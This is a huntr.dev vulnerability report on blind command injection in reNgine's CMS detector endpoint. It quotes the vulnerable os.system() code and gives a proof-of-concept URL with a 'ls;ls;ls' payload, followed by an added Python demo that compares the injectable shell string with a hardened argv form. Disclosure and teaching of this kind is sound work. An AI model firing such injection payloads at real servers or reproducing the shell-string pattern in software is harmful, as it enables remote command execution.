huntr / ph33rr / B255CF59-9ECD-4255-B9A2-B40B5EC6C572
History: Apr 29, 2022 - 1:54 a.m.

Blind command injection

Reporter: ph33rr
Source: www.huntr.dev
Type: command injection
Project: rengine project
Language: python3

EPSS

0.003

Percentile

70.2%

Description

Hello, it's my first report on huntr.dev.

Fast code review:

File 1: https://github.com/yogeshojha/rengine/blob/master/web/api/views.py#L820

# web/api/views.py (excerpt); imports added here for context
from rest_framework.views import APIView
from rest_framework.response import Response

from reNgine.common_func import get_cms_details


class CMSDetector(APIView):
    def get(self, request):
        req = self.request
        # attacker-controlled: taken straight from the query string, never validated
        url = req.query_params.get('url')
        #save_db = True if 'save_db' in req.query_params else False
        response = {'status': False}
        try:
            # the raw `url` flows into get_cms_details() below
            response = get_cms_details(url)
        except Exception as e:
            response = {'status': False, 'message': str(e)}
        return Response(response)

Parameter: url

File 2:
https://github.com/yogeshojha/rengine/blob/master/web/reNgine/common_func.py#L668

# web/reNgine/common_func.py (excerpt, truncated in the report); imports added for context
import os
from urllib.parse import urlparse


def get_cms_details(url):
    # this function will fetch cms details using cms_detector
    response = {}
    # sink: `url` is interpolated into a shell command string and run through os.system(),
    # so shell metacharacters in the query parameter (e.g. ';') are executed as commands
    cms_detector_command = 'python3 /usr/src/github/CMSeeK/cmseek.py -u {} --random-agent --batch --follow-redirect'.format(url)
    os.system(cms_detector_command)

    response['status'] = False
    response['message'] = 'Could not detect CMS!'

    # the URL is only parsed after the command has already run, so this cannot act as validation
    parsed_url = urlparse(url)

    domain_name = parsed_url.hostname
    port = parsed_url.port

    find_dir = domain_name

    if port:
        find_dir += '_{}'.format(port)


    print(url)
    print(find_dir)
    # ... (the function continues in the project source; the report quotes only this part)

Proof of Concept

http:///api/tools/cms_detector/?format=json&url=ls;ls;ls
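The following is an added example, not code from the huntr report or from the rengine project. It reproduces the vulnerable pattern (user input formatted into a shell string and handed to /bin/sh) next to a hardened form (an argv list executed without a shell, plus an allow-list check on the target URL), and shows why the `ls;ls;ls` payload runs as separate commands. The CMSeeK invocation is replaced by `echo cmseek` as a stand-in so the code runs offline; the names `run_vulnerable`, `validate_target_url`, `build_argv`, `run_hardened` and `is_accepted` are illustrative.

```python
import re
import subprocess
from urllib.parse import urlparse

# Harmless stand-in for "python3 /usr/src/github/CMSeeK/cmseek.py" so the demo
# runs offline: "echo" simply prints whatever arguments reach it.
SCANNER = "echo cmseek"
EXTRA_FLAGS = ["--random-agent", "--batch", "--follow-redirect"]


def build_command_string(url):
    """The vulnerable pattern from get_cms_details: user input pasted into a shell string."""
    return "{} -u {} {}".format(SCANNER, url, " ".join(EXTRA_FLAGS))


def run_vulnerable(url):
    """os.system() equivalent: the string goes to /bin/sh, so ';' starts a second command.

    subprocess with shell=True is used instead of os.system only so stdout can be captured.
    """
    proc = subprocess.run(build_command_string(url), shell=True,
                          capture_output=True, text=True)
    return proc.stdout


def validate_target_url(url):
    """Allow-list check: http(s) scheme, hostname of [A-Za-z0-9.-], optional numeric port.

    Raises ValueError on rejection. Note that this only vets the host part; the path
    and query are not checked, which is why no-shell execution (below) is the real fix.
    """
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        raise ValueError("scheme must be http or https: %r" % url)
    if not parsed.hostname or not re.fullmatch(r"[A-Za-z0-9.-]+", parsed.hostname):
        raise ValueError("invalid hostname in %r" % url)
    _ = parsed.port  # raises ValueError if the port is not an integer
    if parsed.username or parsed.password:
        raise ValueError("credentials in URL are not allowed: %r" % url)
    return url


def is_accepted(url):
    """Convenience wrapper: True if validate_target_url() accepts the URL."""
    try:
        validate_target_url(url)
        return True
    except ValueError:
        return False


def build_argv(url):
    """Argument-vector form: each element reaches execve() as-is, no shell parses it."""
    return SCANNER.split() + ["-u", url] + EXTRA_FLAGS


def run_argv_without_shell(url):
    """argv alone: even an unvalidated 'x;echo INJECTED' arrives as one literal argument."""
    proc = subprocess.run(build_argv(url), capture_output=True, text=True)
    return proc.stdout


def run_hardened(url):
    """Both layers: reject suspicious input first, then execute without a shell."""
    return run_argv_without_shell(validate_target_url(url))


if __name__ == "__main__":
    # Constructed inputs: the report's style of payload and a clean target.
    print("vulnerable:\n" + run_vulnerable("ls;echo INJECTED"))
    print("argv only:\n" + run_argv_without_shell("ls;echo INJECTED"))
    print("hardened:\n" + run_hardened("http://example.com:8080/"))
```

With the shell form, `ls;echo INJECTED` produces two lines of output because `sh -c` runs `echo cmseek -u ls` and then `echo INJECTED ...` as separate commands; with the argv form the whole payload is printed back as a single literal argument. The allow-list accepts a URL such as `http://example.com/$(id)` because it only inspects the host, so treat it as defence in depth and rely on the argv form to keep `$(id)` from ever being expanded.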
